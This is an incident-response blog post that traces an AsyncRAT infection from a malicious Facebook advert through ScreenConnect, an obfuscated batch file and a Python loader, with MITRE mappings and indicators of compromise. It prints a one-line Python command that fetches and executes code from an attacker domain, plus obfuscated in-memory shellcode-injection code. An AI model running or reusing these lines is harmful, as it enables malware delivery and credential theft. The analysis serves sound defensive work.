Tldr;
This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, involving AsyncRAT.
Below provides a summary of findings which are presented in this blog post:
- Initial access via a drive by compromise
- Use of ScreenConnect for persistence and file transfers
- Credential Harvesting via AsyncRAT
Incident Overview
The Threat Actor created a malicious advert on Facebook which the affected user clicked. This led to the execution of ScreenConnect disguised as a Grok AI creation.
Files were transferred to the host using ScreenConnect; one of these files was AsyncRAT. This was a single host attack however browser data was collected and keystrokes recorded which were likely exfiltrated by the Threat Actor.
Timeline
T + 0 days – Malicious advert clicked
T + 1 minute – New ScreenConnect service installed
T + 1 day – AsyncRAT transferred and executed on host
T + 4 days – Creation of browser data zip
T + 6 days – Recorded keystrokes log file created.
Mitre TTPs
Resource Development
T1583.008 – Acquire Infrastructure: Malvertising
The Threat Actor had created a malicious advert on Facebook which included the malicious domain canvadreamlab[.]xyz.
The origin URL is hxxps://shortenworld[.]com/branded-domain/canvadreamlab.xyz, which utilises the URL shortener Shorten World.
Initial Access
T1189 – Drive by Compromise
The user downloaded a file from hxxps://openaigrok[.]com, after clicking on a Facebook paid advert.
hxxps://l.facebook[.]com/l.php? u=http%3A%2F%2Fcanvadreamlab.xyz%2Fai%3Futm_medium%3Dpaid%26utm_source…
Execution
T1204.002 – User Execution: Malicious File
The user downloaded the following file:
C: \Users\<USER>\Downloads\Creation_Made_By_GrokAI.mp4 OpenAI.com
Subsequently, the C:\Windows\Prefetch\CREATION_MADE_BY_GROKAI.MP4 -3F3E21F6.pf file invoked a ScreenConnect Windows Installer file which was installed on the host in C: \Users\<USER>\AppData\Local\Temp\ScreenConnect\24.4.4.9118\aeef6885fa9229dd\ScreenConnect.ClientSetup.msi.
T1569.002 – System Services: Service Execution The Threat Actor installed a new ScreenConnect service.
{"EventData":{"Data":[{"@Name":"ServiceName","#text":"ScreenConnect Client
(aeef6885fa9229dd)"},{"@Name":"ImagePath","#text":"\"C:\\Program Files (x86)\\ScreenConnect
Client (aeef6885fa9229dd)\\ScreenConnect.ClientService.exe\" \"?
e=Access&y=Guest&h=jtsec.innocreed.com
…
{"@Name":"StartType","#text":"autostart"},{"@Name":"AccountName","#text":"LocalSystem"}]}}
The domain associated with this service installation was jtsec.innocred[.]com. The ScreenConnect user configuration file also contained the IP address 194.26.192[.]107.
T1059.006 – Command and Scripting Interpreter: Python
The C:\xmetavip script was created, as well as 4 files within this folder: 9f.bat, vcruntime140.dll, python310.dll and pw.exe.
Persistence
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
powershell.exe was utilised to create a new property for a specified item and sets its value. The property was the path HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and the value was C:\xmetavip\9f.bat, meaning 9f.bat ran every time the user logged in.
Defence Evasion
T1218.005 – System Binary Proxy Execution: Mshta
C:\Windows\Prefetch\MSHTA.EXE-5D4FFD8E.pf was executed and subsequently the folder, C:\xmetavip, was created on the affected host.
T1406 – Obfuscated Files or Information
The file 9f.bat was heavily obfuscated, an attempt by the Threat Actor to make analysis of the file more difficult. The base64.b64decode function was used in one of the payloads associated with 9f.bat indicating base64 encoding had been used by the Threat Actor.
Credential Access
T1056.001 – Input Capture: Keylogging
The file C:\Users\<USER>\AppData\Local\Temp\Log.tmp was created. This log when examined contained recorded keystrokes. After analysis of the 9f.bat file, the final payload was identified as AsyncRAT which has keylogging capabilities
Collection
T1560 – Archive Collected Data
The file C:\Users\<USER>\AppData\Local\Temp\[REDACTED]\REDACTED.zip was created on the host. The zip file contained the following folders which largely consisted of browser data such as login credentials and cookies:
- AutoFills (Chrome_Default.txt, Chrome_Profile 1.txt, Edge_Default.txt)
-Cookies Browser (Chrome_Default.txt, Chrome_Profile 1.txt, Edge_Default.txt) - Google Chrome Token (Chrome_Profile 1.txt)
- All Passwords.txt
-Facebook_Cookies.txt
-Word_List.txt
Command and Control
T1219 – Remote Access Software
The Threat Actor utilised the remote access application ScreenConnect. The ScreenConnect user configuration file contained the jtsec.innocreed[.]com domain and 194.26.192[.]107 IP address.
The Threat Actor utilised the file transfer feature of this application. The files transferred can be seen below:
- xDone.bat
- X-METAPURE_crypted.bat
- 0718x.bat
None of these files were on disk at the time of the investigation so their exact purpose is unknown.
AsyncRAT
The files 9f.bat, vcruntime140.dll, python310.dll and pw.exe, likely transferred via ScreenConnect resided on the host at the time of analysis and were further investigated.
It was identified that pw.exe was the legitimate Python interpreter and the above DLL files belonged to pw.exe. However, 9f.bat was malicious.
When 9f.bat was executed, it used Mshta, the Windows utility designed to execute script code. Also, Chcp, the Windows utility to change the active console code page, was leveraged by the Threat Actor; observed when C:\Windows\Prefetch\CHCP.COM-2CF9B15C.pf was launched.
Command Prompt was then used to execute the C:\xmetavip\pw.exe file which imported base64 encoded code.
import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https:// authenticate-meta.com/purelogbank2').read().decode('utf-8')))%
When decoded, this retrieved the URL hxxps://authenticate-meta[.]com/purelogbank2. The content on this URL was a large amount of base64.
The payload from this URL contained obfuscated Python code. It likely downloaded extra payloads and executed these in memory. The code below indicates the use of the kernel32.RtlMoveMemory function [1].
buf = base64.b64decode(urllib.request.urlopen((lambda : (lambda : (lambda
: R_E_D__A_V____(______________R_E_D__A_V______________
(R_E_D__A_V______________(R_E_D__A_V____ ___________, [(lambda :
R_E_D__A_V(b'R_E_D__A_V__\xffyg'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__
\xffys'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__\xffys'))(), (lambda :
... ()).read().decode((lambda : (lambda : (lambda : R_E_D__A_V____
(______________R_E_D__A_V______________(R_E_D__A_V______________
(R_E_D__A_V____ ___________, [(lambda : R_E_D__A_V(b'R_E_D__A_V__\xffyt'))
(), (lambda :
R_E_D__A_V(b'R_E_D__A_V__\xffys'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__\
xffye'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__\xffy,'))(), (lambda :
R_E_D__A_V(b'R_E_D__A_V__\xffy7')) ()]))))())())())) memAddr =
kernel32.VirtualAlloc(None, len(buf), (lambda : R_E_D__A_V(b'R_E_D__A_V__0
\x00'))(), (lambda : R_E_D__A_V(b'R_E_D__A_V__@')) ()) kernel32.
RtlMoveMemory(memAddr, buf, len(buf)) th = kernel32.CreateThread
(ctypes.c_int((lambda : R_E_D__A_V(b'R_E_D__A_V__')) ()), ctypes.c_int
((lambda : R_E_D__A_V(b'R_E_D__A_V__'))()), ctypes.c_void_p(memAddr),
ctypes.c_int((lambda : R_E_D__A_V(b'R_E_D__A_V__')) ()), ctypes.c_int
((lambda : R_E_D__A_V(b'R_E_D__A_V__'))()), ctypes.pointer(ctypes.c_int
((lambda : R_E_D__A_V(b'R_E_D__A_V__'))()))) kernel32.WaitForSingleObject
(th, -(lambda : R_E_D__A_V(b’R_E_D__A_V__\x01’))())
The 9f.bat file pulls in the purelogbank2 python script, which then downloads the next payload, Isrgorpev22.b64 and there it continues the various stages. The Isrgorpev22.b64 file was identified to be shellcode - a small piece of executable code used as a payload to carry out malicious commands. The shellcode decrypts a .Net shellcode and is loaded by the donut loader [2]. Donut is a code that enables in-memory execution of VBScript, JScript, EXE, DLL files and .Net assemblies.
The final payload is an obfuscated .Net executable (that came from shellcode) and was identified to be AsyncRAT with C2 capabilities. The final payload connects to 185.149.232[.]197:56001 over SSL.
Recommendations
- Plaintext passwords were identified on the affected host. User awareness training is vital to ensure users understand the risks of storing passwords on devices. Providing alternative solutions such as a password manager, which access to is logged, is advised.
- Disable Autofill in browsers. The affected user had AutoFill enabled which meant the Threat Actor was able to harvest their personal details easily.
IOCs
| Vale | Type | Comment |
|---|---|---|
| canvadreamlab[.]xyz | Domain | Facebook advert URL |
| jtsec.innocreed[.]com | Domain | Domain ScreenConnect user configuration |
| authenticate-meta[.]com | Domain | Domain Linked to 9f.bat |
| 194.26.192[.]107 | IP | ScreenConnect user configuration |
| openaigrok[.]com | Domain | Fake domain |
| 9248D6CC80B61F3FE0B9D 280B86A3AEFF2AA73F0 | Hash | SHA1 Hash for 9f.bat |
| 723d51af347d333f89a6213 714ef6540520a55c9 | Hash | SHA1 Hash for ScreenConnect executable |
| 185.149.232[.]197:56001 | IP:Port | Final payload C2 linked to 9f.bat |
References
[1] https://www.forcepoint.com/blog/x-labs/asyncrat-reloaded-python-trycloudflare-malware